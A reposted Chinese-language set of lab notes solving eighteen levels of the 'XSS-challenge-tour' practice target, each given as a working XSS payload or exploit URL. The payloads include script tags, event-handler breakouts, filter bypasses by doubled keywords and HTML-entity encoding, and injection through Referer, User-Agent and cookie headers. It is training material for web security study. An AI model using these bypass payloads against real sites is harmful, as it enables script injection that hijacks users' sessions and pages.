碼上快樂

相關內容    簡體    繁體

XSS-challenge-tour靶機測試筆記

本文轉載自   查看原文   2020-08-07 09:27   528    靶機測試

-使用vulstudy一鍵搭建靶機

1 http://192.168.0.200:8091/level1.php?name=test<script>alert(/x/)</script>

2 http://192.168.0.200:8091/level2.php?keyword=test"><script>alert(/x/)</script>

3 http://192.168.0.200:8091/level3.php?keyword=xx'+onmouseover%3D'alert(%2Fx%2F)&submit=搜索
Payload: onmouseover='alert(1)

4 http://192.168.0.200:8091/level4.php?keyword=try+harder!"+onmouseover%3D"alert(%2Fx%2F)&submit=搜索
Payload: onmouseover="alert(1)

5 http://192.168.0.200:8091/level5.php?keyword=find+a+way+out!"><embed+src%3Djavascript%3Aalert(1)>&submit=搜索
本題會檢測'on' 字符串和script ,檢測到會自動添加下划線為o_nmouseover

6 http://192.168.0.200:8091/level6.php?keyword=break+it+out!"><scRipt>alert(%2Fx%2F)<%2Fscript>&submit=搜索
檢測href src on data字符並添加下划線
Payload:

7 http://192.168.0.200:8091/level7.php?keyword=move+up!"+oonnmouseover%3D"alert(1)&submit=搜索
過濾on字符,考慮雙寫
Payload: oonnmouseover="alert(1)

8 http://192.168.0.200:8091/level8.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2348%3B%26%2341&submit=添加友情鏈接
檢測href src on data字符並添加下划線,同時對輸入的雙引號進行html編碼
Payload: 使用unicode編碼javascript:alert(0),即

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41

#python2腳本生成unicode
orgCode='javascript:alert(0)'  #替換腳本
print ';'.join('&#{}'.format(ord(x)) for x in orgCode)

參考:https://programmer.help/blogs/xss-challenge-tour-by-reading-the-code.html

9 Payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41//http://

考察繞過strpos

10
Payload: " autofocus="" onfocus="javascript:alert(1)" type="
利用type=""覆蓋掉input的隱藏type,從而執行onfocus

11 Payload: 在refer處添加 " autofocus="" onfocus="javascript:alert(1)" type="

12 Payload: 在user-agent處添加 " autofocus="" onfocus="javascript:alert(1)" type="

13 Payload: 在cookie中user處添加 " autofocus="" onfocus="javascript:alert(1)" type="

14 頁面生成cookie有問題

15 Payload: http://10.150.10.186:8091/level15.php?src='level6.php'
ng-include 為AngularJS 指令 ,主要用來包含其他文件,我們可以包含之前的文件來插入xss。注意這兒使用時瀏覽器會訪問googleapis.com失敗導致刷不出來

16 考察繞過空格
Payload: <img%0Asrc=x%0Aonerror=alert(0)>

17 這兒有坑,在firefox下embed標簽不顯示,不顯示的話就利用不成功,需要在chrome下才能正常成功
Payload: http://10.150.10.186:8091/level17.php?arg01=x&arg02= onmouseover=javascript:alert(1)

18 http://192.168.61.242:8091/level18.php?arg01= onmouseover&arg02=alert(0)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 HTB-Buff靶機測試筆記 pwnlab-init靶機測試筆記 Kioptrix_Level_1靶機測試筆記 我的滲透測試筆記(一) CTS測試筆記 sdk測試筆記 ZooKeeper測試筆記 XSS靶機 kalilinux 滲透測試筆記 軟件測試筆記(四):白盒測試
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM